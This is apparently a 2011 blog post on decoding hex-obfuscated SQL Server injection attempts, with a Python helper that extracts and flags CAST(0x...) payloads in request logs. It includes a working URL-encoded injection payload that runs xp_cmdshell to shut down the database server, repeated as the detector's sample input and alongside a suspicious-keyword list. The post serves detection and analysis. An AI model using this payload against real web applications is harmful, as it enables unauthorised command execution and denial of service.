decoding sql injection attempts

October 10, 2011

Background

SQL Server has a function called CAST that can convert a hex-encoded array of character codes into text. Attackers can use this function to obfuscate a SQL injection payload and bypass filters that block SQL commands or hazardous characters.
Here is an example of an attack that uses this technique:

DECLARE @S CHAR(4000);
SET @S=CAST(0x<ASCII code array as hex> AS CHAR(4000));
EXEC(@S);

The first step declares a variable that will hold the attack payload.
The second step assigns the obfuscated (hex-encoded) payload to the variable; the CAST function decodes it back into text.
In the third step, the decoded payload is executed.

Sample Exploit

The following payload shuts down the database server by executing the command exec master..xp_cmdshell 'shutdown -f':

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(4000));EXEC(@S);

Affected Products
Web applications backed by Microsoft SQL Server.

Let's start decoding sql injection attempts

Payload

0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700

To Decode (on linux)

# echo "0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700" | xxd -r -p

This yields our payload:

exec master..xp_cmdshell 'shutdown -f'
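As an added example (not code from the original post), here is a Python helper that performs the same decoding over a raw request string, the way a log reviewer or a WAF rule would need to: it URL-decodes the request, extracts each CAST(0x... AS type) literal, decodes the hex as UTF-16LE for NVARCHAR/NCHAR (the post's bytes carry NUL padding that the xxd output hides), and flags the SQL keywords the payload relies on. SAMPLE_REQUEST is the post's payload re-typed as a constructed input; the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the URL-encoded request fragment from the post.
SAMPLE_REQUEST = (
    "';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "650078006500630020006D006100730074006500"
    "72002E002E00780070005F0063006D0064007300"
    "680065006C006C00200027007300680075007400"
    "64006F0077006E0020002D0066002700"
    "%20AS%20NVARCHAR(4000));EXEC(@S);"
)

# CAST(0x<hex> AS CHAR|NCHAR|VARCHAR|NVARCHAR ...), matched after URL-decoding.
# Case-insensitive because T-SQL keywords are.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR|N?CHAR)",
                     re.IGNORECASE)

# Keywords the post's payload relies on; a filter only sees them after decoding.
SUSPICIOUS = ("xp_cmdshell", "exec", "shutdown")

def decode_hex_literal(hex_digits, target_type):
    """Decode a 0x literal the way CAST to the given character type would."""
    if len(hex_digits) % 2:          # SQL Server pads odd-length literals
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    # NVARCHAR/NCHAR store UTF-16LE.  The post's bytes are UTF-16LE even when
    # cast to CHAR: the NULs survive but a terminal hides them, so detect the
    # every-other-byte-is-NUL pattern and decode it as UTF-16LE as well.
    utf16_shaped = len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])
    if target_type.upper().startswith("N") or utf16_shaped:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def extract_cast_payloads(request):
    """Return every decoded CAST(0x...) string found in a raw request."""
    decoded = unquote(request)
    return [decode_hex_literal(h, t) for h, t in CAST_RE.findall(decoded)]

def flag_request(request):
    """Pair each decoded payload with the suspicious keywords it contains."""
    return [(p, [k for k in SUSPICIOUS if k in p.lower()])
            for p in extract_cast_payloads(request)]

if __name__ == "__main__":
    for payload, hits in flag_request(SAMPLE_REQUEST):
        print(repr(payload), "->", hits)
```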